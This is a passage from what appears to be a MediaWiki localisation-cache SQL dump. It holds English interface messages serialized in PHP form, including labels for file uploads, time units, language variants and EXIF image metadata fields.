{{PLURAL:$1|frame|frames}}\";'),('en','messages:file-info-png-looped','s:6:\"looped\";'),('en','messages:file-info-png-repeat','s:34:\"played $1 {{PLURAL:$1|time|times}}\";'),('en','messages:file-info-png-frames','s:29:\"$1 {{PLURAL:$1|frame|frames}}\";'),('en','messages:file-no-thumb-animation','s:98:\"Note: Due to technical limitations, thumbnails of this file will not be animated.\";'),('en','messages:file-no-thumb-animation-gif','s:132:\"Note: Due to technical limitations, thumbnails of high resolution GIF images such as this one will not be animated.\";'),('en','messages:newimages','s:20:\"Gallery of new files\";'),('en','messages:newimagestext','s:1:\"-\";'),('en','messages:imagelisttext','s:74:\"Below is a list of $1 {{PLURAL:$1|file|files}} sorted $2.\";'),('en','messages:newimages-summary','s:48:\"This special page shows the last uploaded files.\";'),('en','messages:newimages-legend','s:6:\"Filter\";'),('en','messages:newimages-label','s:27:\"Filename (or a part of it):\";'),('en','messages:newimages-showbots','s:20:\"Show uploads by bots\";'),('en','messages:noimages','s:15:\"Nothing to see.\";'),('en','messages:ilsubmit','s:6:\"Search\";'),('en','messages:bydate','s:7:\"by date\";'),('en','messages:sp-newimages-showfrom','s:35:\"Show new files starting from $2, $1\";'),('en','messages:video-dims','s:12:\"$1, $2 × $3\";'),('en','messages:seconds-abbrev','s:4:\"$1 s\";'),('en','messages:minutes-abbrev','s:6:\"$1 min\";'),('en','messages:hours-abbrev','s:4:\"$1 h\";'),('en','messages:days-abbrev','s:4:\"$1 d\";'),('en','messages:seconds','s:34:\"{{PLURAL:$1|$1 second|$1 seconds}}\";'),('en','messages:minutes','s:34:\"{{PLURAL:$1|$1 minute|$1 minutes}}\";'),('en','messages:hours','s:30:\"{{PLURAL:$1|$1 hour|$1 hours}}\";'),('en','messages:days','s:28:\"{{PLURAL:$1|$1 day|$1 days}}\";'),('en','messages:weeks','s:30:\"{{PLURAL:$1|$1 week|$1 weeks}}\";'),('en','messages:months','s:32:\"{{PLURAL:$1|$1 month|$1 months}}\";'),('en','messages:years','s:30:\"{{PLURAL:$1|$1 year|$1 years}}\";'),('en','messages:ago','s:6:\"$1 ago\";'),('en','messages:just-now','s:8:\"just now\";'),('en','messages:hours-ago','s:31:\"$1 {{PLURAL:$1|hour|hours}} ago\";'),('en','messages:minutes-ago','s:35:\"$1 {{PLURAL:$1|minute|minutes}} ago\";'),('en','messages:seconds-ago','s:35:\"$1 {{PLURAL:$1|second|seconds}} ago\";'),('en','messages:monday-at','s:12:\"Monday at $1\";'),('en','messages:tuesday-at','s:13:\"Tuesday at $1\";'),('en','messages:wednesday-at','s:15:\"Wednesday at $1\";'),('en','messages:thursday-at','s:14:\"Thursday at $1\";'),('en','messages:friday-at','s:12:\"Friday at $1\";'),('en','messages:saturday-at','s:14:\"Saturday at $1\";'),('en','messages:sunday-at','s:12:\"Sunday at $1\";'),('en','messages:today-at','s:2:\"$1\";'),('en','messages:yesterday-at','s:15:\"Yesterday at $1\";'),('en','messages:bad_image_list','s:252:\"The format is as follows:\n\nOnly list items (lines starting with *) are considered.\nThe first link on a line must be a link to a bad file.\nAny subsequent links on the same line are considered to be exceptions, i.e. pages where the file may occur inline.\";'),('en','messages:variantname-zh-hans','s:4:\"hans\";'),('en','messages:variantname-zh-hant','s:4:\"hant\";'),('en','messages:variantname-zh-cn','s:2:\"cn\";'),('en','messages:variantname-zh-tw','s:2:\"tw\";'),('en','messages:variantname-zh-hk','s:2:\"hk\";'),('en','messages:variantname-zh-mo','s:2:\"mo\";'),('en','messages:variantname-zh-sg','s:2:\"sg\";'),('en','messages:variantname-zh-my','s:2:\"my\";'),('en','messages:variantname-zh','s:2:\"zh\";'),('en','messages:variantname-gan-hans','s:4:\"hans\";'),('en','messages:variantname-gan-hant','s:4:\"hant\";'),('en','messages:variantname-gan','s:3:\"gan\";'),('en','messages:variantname-sr-ec','s:5:\"sr-ec\";'),('en','messages:variantname-sr-el','s:5:\"sr-el\";'),('en','messages:variantname-sr','s:2:\"sr\";'),('en','messages:variantname-kk-kz','s:5:\"kk-kz\";'),('en','messages:variantname-kk-tr','s:5:\"kk-tr\";'),('en','messages:variantname-kk-cn','s:5:\"kk-cn\";'),('en','messages:variantname-kk-cyrl','s:7:\"kk-cyrl\";'),('en','messages:variantname-kk-latn','s:7:\"kk-latn\";'),('en','messages:variantname-kk-arab','s:7:\"kk-arab\";'),('en','messages:variantname-kk','s:2:\"kk\";'),('en','messages:variantname-ku-arab','s:7:\"ku-Arab\";'),('en','messages:variantname-ku-latn','s:7:\"ku-Latn\";'),('en','messages:variantname-ku','s:2:\"ku\";'),('en','messages:variantname-tg-cyrl','s:7:\"tg-Cyrl\";'),('en','messages:variantname-tg-latn','s:7:\"tg-Latn\";'),('en','messages:variantname-tg','s:2:\"tg\";'),('en','messages:variantname-ike-cans','s:8:\"ike-Cans\";'),('en','messages:variantname-ike-latn','s:8:\"ike-Latn\";'),('en','messages:variantname-iu','s:2:\"iu\";'),('en','messages:variantname-shi-tfng','s:8:\"shi-Tfng\";'),('en','messages:variantname-shi-latn','s:8:\"shi-Latn\";'),('en','messages:variantname-shi','s:3:\"shi\";'),('en','messages:variantname-uz','s:2:\"uz\";'),('en','messages:variantname-uz-latn','s:7:\"uz-Latn\";'),('en','messages:variantname-uz-cyrl','s:7:\"uz-Cyrl\";'),('en','messages:metadata','s:8:\"Metadata\";'),('en','messages:metadata-help','s:232:\"This file contains additional information, probably added from the digital camera or scanner used to create or digitize it.\nIf the file has been modified from its original state, some details may not fully reflect the modified file.\";'),('en','messages:metadata-expand','s:21:\"Show extended details\";'),('en','messages:metadata-collapse','s:21:\"Hide extended details\";'),('en','messages:metadata-fields','s:329:\"Image metadata fields listed in this message will be included on image page display when the metadata table is collapsed.\nOthers will be hidden by default.\n* make\n* model\n* datetimeoriginal\n* exposuretime\n* fnumber\n* isospeedratings\n* focallength\n* artist\n* copyright\n* imagedescription\n* gpslatitude\n* gpslongitude\n* gpsaltitude\";'),('en','messages:metadata-langitem','s:23:\"$2: $1\";'),('en','messages:metadata-langitem-default','s:2:\"$1\";'),('en','messages:exif-imagewidth','s:5:\"Width\";'),('en','messages:exif-imagelength','s:6:\"Height\";'),('en','messages:exif-bitspersample','s:18:\"Bits per component\";'),('en','messages:exif-compression','s:18:\"Compression scheme\";'),('en','messages:exif-photometricinterpretation','s:17:\"Pixel composition\";'),('en','messages:exif-orientation','s:11:\"Orientation\";'),('en','messages:exif-samplesperpixel','s:20:\"Number of components\";'),('en','messages:exif-planarconfiguration','s:16:\"Data arrangement\";'),('en','messages:exif-ycbcrsubsampling','s:27:\"Subsampling ratio of Y to C\";'),('en','messages:exif-ycbcrpositioning','s:19:\"Y and C positioning\";'),('en','messages:exif-xresolution','s:21:\"Horizontal resolution\";'),('en','messages:exif-yresolution','s:19:\"Vertical resolution\";'),('en','messages:exif-stripoffsets','s:19:\"Image data location\";'),('en','messages:exif-rowsperstrip','s:24:\"Number of rows per strip\";'),('en','messages:exif-stripbytecounts','s:26:\"Bytes per compressed strip\";'),('en','messages:exif-jpeginterchangeformat','s:18:\"Offset to JPEG SOI\";'),('en','messages:exif-jpeginterchangeformatlength','s:18:\"Bytes of JPEG data\";'),('en','messages:exif-whitepoint','s:24:\"White point chromaticity\";'),('en','messages:exif-primarychromaticities','s:29:\"Chromaticities of primarities\";'),('en','messages:exif-ycbcrcoefficients','s:46:\"Color space transformation matrix coefficients\";'),('en','messages:exif-referenceblackwhite','s:40:\"Pair of black and white reference values\";'),('en','messages:exif-datetime','s:25:\"File change date and time\";'),('en','messages:exif-imagedescription','s:11:\"Image title\";'),('en','messages:exif-make','s:19:\"Camera manufacturer\";'),('en','messages:exif-model','s:12:\"Camera model\";'),('en','messages:exif-software','s:13:\"Software used\";'),('en','messages:exif-artist','s:6:\"Author\";'),('en','messages:exif-copyright','s:16:\"Copyright holder\";'),('en','messages:exif-exifversion','s:12:\"Exif version\";'),('en','messages:exif-flashpixversion','s:26:\"Supported Flashpix version\";'),('en','messages:exif-colorspace','s:11:\"Color space\";'),('en','messages:exif-componentsconfiguration','s:25:\"Meaning of each component\";'),('en','messages:exif-compressedbitsperpixel','s:22:\"Image compression mode\";'),('en','messages:exif-pixelydimension','s:11:\"Image width\";'),('en','messages:exif-pixelxdimension','s:12:\"Image height\";'),('en','messages:exif-usercomment','s:13:\"User comments\";'),('en','messages:exif-relatedsoundfile','s:18:\"Related audio file\";'),('en','messages:exif-datetimeoriginal','s:32:\"Date and time of data generation\";'),('en','messages:exif-datetimedigitized','s:27:\"Date and time of digitizing\";'),('en','messages:exif-subsectime','s:19:\"DateTime subseconds\";'),('en','messages:exif-subsectimeoriginal','s:27:\"DateTimeOriginal subseconds\";'),('en','messages:exif-subsectimedigitized','s:28:\"DateTimeDigitized subseconds\";'),('en','messages:exif-exposuretime','s:13:\"Exposure time\";'),('en','messages:exif-exposuretime-format','s:11:\"$1 sec ($2)\";'),('en','messages:exif-fnumber','s:8:\"F Number\";'),('en','messages:exif-fnumber-format','s:4:\"f/$1\";'),('en','messages:exif-exposureprogram','s:16:\"Exposure Program\";'),('en','messages:exif-spectralsensitivity','s:20:\"Spectral sensitivity\";'),('en','messages:exif-isospeedratings','s:16:\"ISO speed rating\";'),('en','messages:exif-shutterspeedvalue','s:18:\"APEX shutter speed\";'),('en','messages:exif-aperturevalue','s:13:\"APEX aperture\";'),('en','messages:exif-brightnessvalue','s:15:\"APEX brightness\";'),('en','messages:exif-exposurebiasvalue','s:18:\"APEX exposure bias\";'),('en','messages:exif-maxaperturevalue','s:21:\"Maximum land aperture\";'),('en','messages:exif-subjectdistance','s:16:\"Subject distance\";'),('en','messages:exif-meteringmode','s:13:\"Metering mode\";'),('en','messages:exif-lightsource','s:12:\"Light source\";'),('en','messages:exif-flash','s:5:\"Flash\";'),('en','messages:exif-focallength','s:17:\"Lens focal length\";'),('en','messages:exif-focallength-format','s:5:\"$1 mm\";'),('en','messages:exif-subjectarea','s:12:\"Subject area\";'),('en','messages:exif-flashenergy','s:12:\"Flash energy\";'),('en','messages:exif-focalplanexresolution','s:24:\"Focal plane X resolution\";'),('en','messages:exif-focalplaneyresolution','s:24:\"Focal plane Y resolution\";'),('en','messages:exif-focalplaneresolutionunit','s:27:\"Focal plane resolution unit\";'),('en','messages:exif-subjectlocation','s:16:\"Subject location\";'),('en','messages:exif-exposureindex','s:14:\"Exposure index\";'),('en','messages:exif-sensingmethod','s:14:\"Sensing method\";'),('en','messages:exif-filesource','s:11:\"File source\";'),('en','messages:exif-scenetype','s:10:\"Scene type\";'),('en','messages:exif-customrendered','s:23:\"Custom image processing\";'),('en','messages:exif-exposuremode','s:13:\"Exposure mode\";'),('en','messages:exif-whitebalance','s:13:\"White balance\";'),('en','messages:exif-digitalzoomratio','s:18:\"Digital zoom ratio\";'),('en','messages:exif-focallengthin35mmfilm','s:26:\"Focal length in 35 mm film\";'),('en','messages:exif-scenecapturetype','s:18:\"Scene capture type\";'),('en','messages:exif-gaincontrol','s:13:\"Scene control\";'),('en','messages:exif-contrast','s:8:\"Contrast\";'),('en','messages:exif-saturation','s:10:\"Saturation\";'),('en','messages:exif-sharpness','s:9:\"Sharpness\";'),('en','messages:exif-devicesettingdescription','s:27:\"Device settings description\";'),('en','messages:exif-subjectdistancerange','s:22:\"Subject distance range\";'),('en','messages:exif-imageuniqueid','s:15:\"Unique image ID\";'),('en','messages:exif-gpsversionid','s:15:\"GPS tag version\";'),('en','messages:exif-gpslatituderef','s:23:\"North or south latitude\";'),('en','messages:exif-gpslatitude','s:8:\"Latitude\";'),('en','messages:exif-gpslongituderef','s:22:\"East or west longitude\";'),('en','messages:exif-gpslongitude','s:9:\"Longitude\";'),('en','messages:exif-gpsaltituderef','s:18:\"Altitude reference\";'),('en','messages:exif-gpsaltitude','s:8:\"Altitude\";'),('en','messages:exif-gpstimestamp','s:23:\"GPS time (atomic clock)\";'),('en','messages:exif-gpssatellites','s:31:\"Satellites used for measurement\";'),('en','messages:exif-gpsstatus','s:15:\"Receiver status\";'),('en','messages:exif-gpsmeasuremode','s:16:\"Measurement mode\";'),('en','messages:exif-gpsdop','s:21:\"Measurement precision\";'),('en','messages:exif-gpsspeedref','s:10:\"Speed unit\";'),('en','messages:exif-gpsspeed','s:21:\"Speed of GPS receiver\";'),('en','messages:exif-gpstrackref','s:35:\"Reference for direction of movement\";'),('en','messages:exif-gpstrack','s:21:\"Direction of movement\";'),('en','messages:exif-gpsimgdirectionref','s:32:\"Reference for direction of image\";'),('en','messages:exif-gpsimgdirection','s:18:\"Direction of image\";'),('en','messages:exif-gpsmapdatum','s:25:\"Geodetic survey data used\";'),('en','messages:exif-gpsdestlatituderef','s:37:\"Reference for latitude of destination\";'),('en','messages:exif-gpsdestlatitude','s:20:\"Latitude destination\";'),('en','messages:exif-gpsdestlongituderef','s:38:\"Reference for longitude of destination\";'),('en','messages:exif-gpsdestlongitude','s:24:\"Longitude of destination\";'),('en','messages:exif-gpsdestbearingref','s:36:\"Reference for bearing of destination\";'),('en','messages:exif-gpsdestbearing','s:22:\"Bearing of destination\";'),('en','messages:exif-gpsdestdistanceref','s:37:\"Reference for distance to destination\";'),('en','messages:exif-gpsdestdistance','s:23:\"Distance to destination\";'),('en','messages:exif-gpsprocessingmethod','s:29:\"Name of GPS processing method\";'),('en','messages:exif-gpsareainformation','s:16:\"Name of GPS area\";'),('en','messages:exif-gpsdatestamp','s:8:\"GPS date\";'),('en','messages:exif-gpsdifferential','s:27:\"GPS differential correction\";'),('en','messages:exif-coordinate-format','s:19:\"$1° $2′ $3″ $4\";'),('en','messages:exif-jpegfilecomment','s:17:\"JPEG file comment\";'),('en','messages:exif-keywords','s:8:\"Keywords\";'),('en','messages:exif-worldregioncreated','s:42:\"World region that the picture was taken in\";'),('en','messages:exif-countrycreated','s:37:\"Country that the picture was taken in\";'),('en','messages:exif-countrycodecreated','s:50:\"Code for the country that the picture was taken in\";'),('en','messages:exif-provinceorstatecreated','s:47:\"Province or state that the picture was taken in\";'),('en','messages:exif-citycreated','s:34:\"City that the picture was taken in\";'),('en','messages:exif-sublocationcreated','s:53:\"Sublocation of the city that the picture was taken in\";'),('en','messages:exif-worldregiondest','s:18:\"World region shown\";'),('en','messages:exif-countrydest','s:13:\"Country shown\";'),('en','messages:exif-countrycodedest','s:22:\"Code for country shown\";'),('en','messages:exif-provinceorstatedest','s:23:\"Province or state shown\";'),('en','messages:exif-citydest','s:10:\"City shown\";'),('en','messages:exif-sublocationdest','s:25:\"Sublocation of city shown\";'),('en','messages:exif-objectname','s:11:\"Short title\";'),('en','messages:exif-specialinstructions','s:20:\"Special instructions\";'),('en','messages:exif-headline','s:8:\"Headline\";'),('en','messages:exif-credit','s:15:\"Credit/Provider\";'),('en','messages:exif-source','s:6:\"Source\";'),('en','messages:exif-editstatus','s:25:\"Editorial status of image\";'),('en','messages:exif-urgency','s:7:\"Urgency\";'),('en','messages:exif-fixtureidentifier','s:12:\"Fixture name\";'),('en','messages:exif-locationdest','s:17:\"Location depicted\";'),('en','messages:exif-locationdestcode','s:25:\"Code of location depicted\";'),('en','messages:exif-objectcycle','s:38:\"Time of day that media is intended for\";'),('en','messages:exif-contact','s:19:\"Contact information\";'),('en','messages:exif-writer','s:6:\"Writer\";'),('en','messages:exif-languagecode','s:8:\"Language\";'),('en','messages:exif-iimversion','s:11:\"IIM version\";'),('en','messages:exif-iimcategory','s:8:\"Category\";'),('en','messages:exif-iimsupplementalcategory','s:23:\"Supplemental categories\";'),('en','messages:exif-datetimeexpires','s:16:\"Do not use after\";'),('en','messages:exif-datetimereleased','s:11:\"Released on\";'),('en','messages:exif-originaltransmissionref','s:35:\"Original transmission location code\";'),('en','messages:exif-identifier','s:10:\"Identifier\";'),('en','messages:exif-lens','s:9:\"Lens used\";'),('en','messages:exif-serialnumber','s:23:\"Serial number of camera\";'),('en','messages:exif-cameraownername','s:15:\"Owner of camera\";'),('en','messages:exif-label','s:5:\"Label\";'),('en','messages:exif-datetimemetadata','s:31:\"Date metadata was last modified\";'),('en','messages:exif-nickname','s:22:\"Informal name of image\";'),('en','messages:exif-rating','s:17:\"Rating (out of 5)\";'),('en','messages:exif-rightscertificate','s:29:\"Rights management certificate\";'),('en','messages:exif-copyrighted','s:16:\"Copyright status\";'),('en','messages:exif-copyrightowner','s:15:\"Copyright owner\";'),('en','messages:exif-usageterms','s:11:\"Usage terms\";'),('en','messages:exif-webstatement','s:26:\"Online copyright statement\";'),('en','messages:exif-originaldocumentid','s:30:\"Unique ID of original document\";'),('en','messages:exif-licenseurl','s:25:\"URL for copyright license\";'),('en','messages:exif-morepermissionsurl','s:33:\"Alternative licensing information\";'),('en','messages:exif-attributionurl','s:39:\"When re-using this work, please link to\";'),('en','messages:exif-preferredattributionname','s:38:\"When re-using this work, please credit\";'),('en','messages:exif-pngfilecomment','s:16:\"PNG file comment\";'),('en','messages:exif-disclaimer','s:10:\"Disclaimer\";'),('en','messages:exif-contentwarning','s:15:\"Content warning\";'),('en','messages:exif-giffilecomment','s:16:\"GIF file comment\";'),('en','messages:exif-intellectualgenre','s:12:\"Type of item\";'),('en','messages:exif-subjectnewscode','s:12:\"Subject code\";'),('en','messages:exif-scenecode','s:15:\"IPTC scene code\";'),('en','messages:exif-event','s:14:\"Event depicted\";'),('en','messages:exif-organisationinimage','s:21:\"Organization depicted\";'),('en','messages:exif-personinimage','s:15:\"Person depicted\";'),('en','messages:exif-originalimageheight','s:37:\"Height of image before it was cropped\";'),('en','messages:exif-originalimagewidth','s:36:\"Width of image before it was cropped\";'),('en','messages:exif-make-value','s:2:\"$1\";'),('en','messages:exif-model-value','s:2:\"$1\";'),('en','messages:exif-software-value','s:2:\"$1\";'),('en','messages:exif-software-version-value','s:15:\"$1 (Version $2)\";'),('en','messages:exif-contact-value','s:52:\"$1\n\n$2\n
                                                                \n$3\n\n$4, $5, $6 $7\n
                                                                \n$8\";'),('en','messages:exif-subjectnewscode-value','s:7:\"$2 ($1)\";'),('en','messages:exif-compression-1','s:12:\"Uncompressed\";'),('en','messages:exif-compression-2','s:64:\"CCITT Group 3 1-Dimensional Modified Huffman run length encoding\";'),('en','messages:exif-compression-3','s:26:\"CCITT Group 3 fax encoding\";'),('en','messages:exif-compression-4','s:26:\"CCITT Group 4 fax encoding\";'),('en','messages:exif-compression-5','s:3:\"LZW\";'),('en','messages:exif-compression-6','s:10:\"JPEG (old)\";'),('en','messages:exif-compression-7','s:4:\"JPEG\";'),('en','messages:exif-compression-8','s:15:\"Deflate (Adobe)\";'),('en','messages:exif-compression-32773','s:24:\"PackBits (Macintosh RLE)\";'),('en','messages:exif-compression-32946','s:15:\"Deflate (PKZIP)\";'),('en','messages:exif-compression-34712','s:8:\"JPEG2000\";'),('en','messages:exif-copyrighted-true','s:11:\"Copyrighted\";'),('en','messages:exif-copyrighted-false','s:24:\"Copyright status not set\";'),('en','messages:exif-photometricinterpretation-2','s:3:\"RGB\";'),('en','messages:exif-photometricinterpretation-6','s:5:\"YCbCr\";'),('en','messages:exif-unknowndate','s:12:\"Unknown date\";'),('en','messages:exif-orientation-1','s:6:\"Normal\";'),('en','messages:exif-orientation-2','s:20:\"Flipped horizontally\";'),('en','messages:exif-orientation-3','s:13:\"Rotated 180°\";'),('en','messages:exif-orientation-4','s:18:\"Flipped vertically\";'),('en','messages:exif-orientation-5','s:39:\"Rotated 90° CCW and flipped vertically\";'),('en','messages:exif-orientation-6','s:16:\"Rotated 90° CCW\";'),('en','messages:exif-orientation-7','s:38:\"Rotated 90° CW and flipped vertically\";'),('en','messages:exif-orientation-8','s:15:\"Rotated 90° CW\";'),('en','messages:exif-planarconfiguration-1','s:13:\"chunky format\";'),('en','messages:exif-planarconfiguration-2','s:13:\"planar format\";'),('en','messages:exif-xyresolution-i','s:6:\"$1 dpi\";'),('en','messages:exif-xyresolution-c','s:6:\"$1 dpc\";'),('en','messages:exif-colorspace-1','s:4:\"sRGB\";'),('en','messages:exif-colorspace-65535','s:12:\"Uncalibrated\";'),('en','messages:exif-componentsconfiguration-0','s:14:\"does not exist\";'),('en','messages:exif-componentsconfiguration-1','s:1:\"Y\";'),('en','messages:exif-componentsconfiguration-2','s:2:\"Cb\";'),('en','messages:exif-componentsconfiguration-3','s:2:\"Cr\";'),('en','messages:exif-componentsconfiguration-4','s:1:\"R\";'),('en','messages:exif-componentsconfiguration-5','s:1:\"G\";'),('en','messages:exif-componentsconfiguration-6','s:1:\"B\";'),('en','messages:exif-exposureprogram-0','s:11:\"Not defined\";'),('en','messages:exif-exposureprogram-1','s:6:\"Manual\";'),('en','messages:exif-exposureprogram-2','s:14:\"Normal program\";'),('en','messages:exif-exposureprogram-3','s:17:\"Aperture priority\";'),('en','messages:exif-exposureprogram-4','s:16:\"Shutter priority\";'),('en','messages:exif-exposureprogram-5','s:47:\"Creative program (biased toward depth of field)\";'),('en','messages:exif-exposureprogram-6','s:49:\"Action program (biased toward fast shutter speed)\";'),('en','messages:exif-exposureprogram-7','s:67:\"Portrait mode (for closeup photos with the background out of focus)\";'),('en','messages:exif-exposureprogram-8','s:66:\"Landscape mode (for landscape photos with the background in focus)\";'),('en','messages:exif-subjectdistance-value','s:9:\"$1 meters\";'),('en','messages:exif-meteringmode-0','s:7:\"Unknown\";'),('en','messages:exif-meteringmode-1','s:7:\"Average\";'),('en','messages:exif-meteringmode-2','s:23:\"Center weighted average\";'),('en','messages:exif-meteringmode-3','s:4:\"Spot\";'),('en','messages:exif-meteringmode-4','s:10:\"Multi-Spot\";'),('en','messages:exif-meteringmode-5','s:7:\"Pattern\";'),('en','messages:exif-meteringmode-6','s:7:\"Partial\";'),('en','messages:exif-meteringmode-255','s:5:\"Other\";'),('en','messages:exif-lightsource-0','s:7:\"Unknown\";'),('en','messages:exif-lightsource-1','s:8:\"Daylight\";'),('en','messages:exif-lightsource-2','s:11:\"Fluorescent\";'),('en','messages:exif-lightsource-3','s:29:\"Tungsten (incandescent light)\";'),('en','messages:exif-lightsource-4','s:5:\"Flash\";'),('en','messages:exif-lightsource-9','s:12:\"Fine weather\";'),('en','messages:exif-lightsource-10','s:14:\"Cloudy weather\";'),('en','messages:exif-lightsource-11','s:5:\"Shade\";'),('en','messages:exif-lightsource-12','s:39:\"Daylight fluorescent (D 5700 – 7100K)\";'),('en','messages:exif-lightsource-13','s:40:\"Day white fluorescent (N 4600 – 5400K)\";'),('en','messages:exif-lightsource-14','s:41:\"Cool white fluorescent (W 3900 – 4500K)\";'),('en','messages:exif-lightsource-15','s:37:\"White fluorescent (WW 3200 – 3700K)\";'),('en','messages:exif-lightsource-17','s:16:\"Standard light A\";'),('en','messages:exif-lightsource-18','s:16:\"Standard light B\";'),('en','messages:exif-lightsource-19','s:16:\"Standard light C\";'),('en','messages:exif-lightsource-20','s:3:\"D55\";'),('en','messages:exif-lightsource-21','s:3:\"D65\";'),('en','messages:exif-lightsource-22','s:3:\"D75\";'),('en','messages:exif-lightsource-23','s:3:\"D50\";'),('en','messages:exif-lightsource-24','s:19:\"ISO studio tungsten\";'),('en','messages:exif-lightsource-255','s:18:\"Other light source\";'),('en','messages:exif-flash-fired-0','s:18:\"Flash did not fire\";'),('en','messages:exif-flash-fired-1','s:11:\"Flash fired\";'),('en','messages:exif-flash-return-0','s:35:\"no strobe return detection function\";'),('en','messages:exif-flash-return-2','s:32:\"strobe return light not detected\";'),('en','messages:exif-flash-return-3','s:28:\"strobe return light detected\";'),('en','messages:exif-flash-mode-1','s:23:\"compulsory flash firing\";'),('en','messages:exif-flash-mode-2','s:28:\"compulsory flash suppression\";'),('en','messages:exif-flash-mode-3','s:9:\"auto mode\";'),('en','messages:exif-flash-function-1','s:17:\"No flash function\";'),('en','messages:exif-flash-redeye-1','s:22:\"red-eye reduction mode\";'),('en','messages:exif-focalplaneresolutionunit-2','s:6:\"inches\";'),('en','messages:exif-sensingmethod-1','s:9:\"Undefined\";'),('en','messages:exif-sensingmethod-2','s:26:\"One-chip color area sensor\";'),('en','messages:exif-sensingmethod-3','s:26:\"Two-chip color area sensor\";'),('en','messages:exif-sensingmethod-4','s:28:\"Three-chip color area sensor\";'),('en','messages:exif-sensingmethod-5','s:28:\"Color sequential area sensor\";'),('en','messages:exif-sensingmethod-7','s:16:\"Trilinear sensor\";'),('en','messages:exif-sensingmethod-8','s:30:\"Color sequential linear sensor\";'),('en','messages:exif-filesource-3','s:20:\"Digital still camera\";'),('en','messages:exif-scenetype-1','s:29:\"A directly photographed image\";'),('en','messages:exif-customrendered-0','s:14:\"Normal process\";'),('en','messages:exif-customrendered-1','s:14:\"Custom process\";'),('en','messages:exif-exposuremode-0','s:13:\"Auto exposure\";'),('en','messages:exif-exposuremode-1','s:15:\"Manual exposure\";'),('en','messages:exif-exposuremode-2','s:12:\"Auto bracket\";'),('en','messages:exif-whitebalance-0','s:18:\"Auto white balance\";'),('en','messages:exif-whitebalance-1','s:20:\"Manual white balance\";'),('en','messages:exif-scenecapturetype-0','s:8:\"Standard\";'),('en','messages:exif-scenecapturetype-1','s:9:\"Landscape\";'),('en','messages:exif-scenecapturetype-2','s:8:\"Portrait\";'),('en','messages:exif-scenecapturetype-3','s:11:\"Night scene\";'),('en','messages:exif-gaincontrol-0','s:4:\"None\";'),('en','messages:exif-gaincontrol-1','s:11:\"Low gain up\";'),('en','messages:exif-gaincontrol-2','s:12:\"High gain up\";'),('en','messages:exif-gaincontrol-3','s:13:\"Low gain down\";'),('en','messages:exif-gaincontrol-4','s:14:\"High gain down\";'),('en','messages:exif-contrast-0','s:6:\"Normal\";'),('en','messages:exif-contrast-1','s:4:\"Soft\";'),('en','messages:exif-contrast-2','s:4:\"Hard\";'),('en','messages:exif-saturation-0','s:6:\"Normal\";'),('en','messages:exif-saturation-1','s:14:\"Low saturation\";'),('en','messages:exif-saturation-2','s:15:\"High saturation\";'),('en','messages:exif-sharpness-0','s:6:\"Normal\";'),('en','messages:exif-sharpness-1','s:4:\"Soft\";'),('en','messages:exif-sharpness-2','s:4:\"Hard\";'),('en','messages:exif-subjectdistancerange-0','s:7:\"Unknown\";'),('en','messages:exif-subjectdistancerange-1','s:5:\"Macro\";'),('en','messages:exif-subjectdistancerange-2','s:10:\"Close view\";'),('en','messages:exif-subjectdistancerange-3','s:12:\"Distant view\";'),('en','messages:exif-gpslatitude-n','s:14:\"North latitude\";'),('en','messages:exif-gpslatitude-s','s:14:\"South latitude\";'),('en','messages:exif-gpslongitude-e','s:14:\"East longitude\";'),('en','messages:exif-gpslongitude-w','s:14:\"West longitude\";'),('en','messages:exif-gpsaltitude-above-sealevel','s:45:\"$1 {{PLURAL:$1|meter|meters}} above sea level\";'),('en','messages:exif-gpsaltitude-below-sealevel','s:45:\"$1 {{PLURAL:$1|meter|meters}} below sea level\";'),('en','messages:exif-gpsstatus-a','s:23:\"Measurement in progress\";'),('en','messages:exif-gpsstatus-v','s:28:\"Measurement interoperability\";'),('en','messages:exif-gpsmeasuremode-2','s:25:\"2-dimensional measurement\";'),('en','messages:exif-gpsmeasuremode-3','s:25:\"3-dimensional measurement\";'),('en','messages:exif-gpsspeed-k','s:19:\"Kilometers per hour\";'),('en','messages:exif-gpsspeed-m','s:14:\"Miles per hour\";'),('en','messages:exif-gpsspeed-n','s:5:\"Knots\";'),('en','messages:exif-gpsdestdistance-k','s:10:\"Kilometers\";'),('en','messages:exif-gpsdestdistance-m','s:5:\"Miles\";'),('en','messages:exif-gpsdestdistance-n','s:14:\"Nautical miles\";'),('en','messages:exif-gpsdop-excellent','s:14:\"Excellent ($1)\";'),('en','messages:exif-gpsdop-good','s:9:\"Good ($1)\";'),('en','messages:exif-gpsdop-moderate','s:13:\"Moderate ($1)\";'),('en','messages:exif-gpsdop-fair','s:9:\"Fair ($1)\";'),('en','messages:exif-gpsdop-poor','s:9:\"Poor ($1)\";'),('en','messages:exif-objectcycle-a','s:12:\"Morning only\";'),('en','messages:exif-objectcycle-p','s:12:\"Evening only\";'),('en','messages:exif-objectcycle-b','s:24:\"Both morning and evening\";'),('en','messages:exif-gpsdirection-t','s:14:\"True direction\";'),('en','messages:exif-gpsdirection-m','s:18:\"Magnetic direction\";'),('en','messages:exif-ycbcrpositioning-1','s:8:\"Centered\";'),('en','messages:exif-ycbcrpositioning-2','s:8:\"Co-sited\";'),('en','messages:exif-dc-contributor','s:12:\"Contributors\";'),('en','messages:exif-dc-coverage','s:34:\"Spatial or temporal scope of media\";'),('en','messages:exif-dc-date','s:7:\"Date(s)\";'),('en','messages:exif-dc-publisher','s:9:\"Publisher\";'),('en','messages:exif-dc-relation','s:13:\"Related media\";'),('en','messages:exif-dc-rights','s:6:\"Rights\";'),('en','messages:exif-dc-source','s:12:\"Source media\";'),('en','messages:exif-dc-type','s:13:\"Type of media\";'),('en','messages:exif-rating-rejected','s:8:\"Rejected\";'),('en','messages:exif-isospeedratings-overflow','s:18:\"Greater than 65535\";'),('en','messages:exif-maxaperturevalue-value','s:14:\"$1 APEX (f/$2)\";'),('en','messages:exif-iimcategory-ace','s:31:\"Arts, culture and entertainment\";'),('en','messages:exif-iimcategory-clj','s:13:\"Crime and law\";'),('en','messages:exif-iimcategory-dis','s:23:\"Disasters and accidents\";'),('en','messages:exif-iimcategory-fin','s:20:\"Economy and business\";'),('en','messages:exif-iimcategory-edu','s:9:\"Education\";'),('en','messages:exif-iimcategory-evn','s:11:\"Environment\";'),('en','messages:exif-iimcategory-hth','s:6:\"Health\";'),('en','messages:exif-iimcategory-hum','s:14:\"Human interest\";'),('en','messages:exif-iimcategory-lab','s:5:\"Labor\";'),('en','messages:exif-iimcategory-lif','s:21:\"Lifestyle and leisure\";'),('en','messages:exif-iimcategory-pol','s:8:\"Politics\";'),('en','messages:exif-iimcategory-rel','s:19:\"Religion and 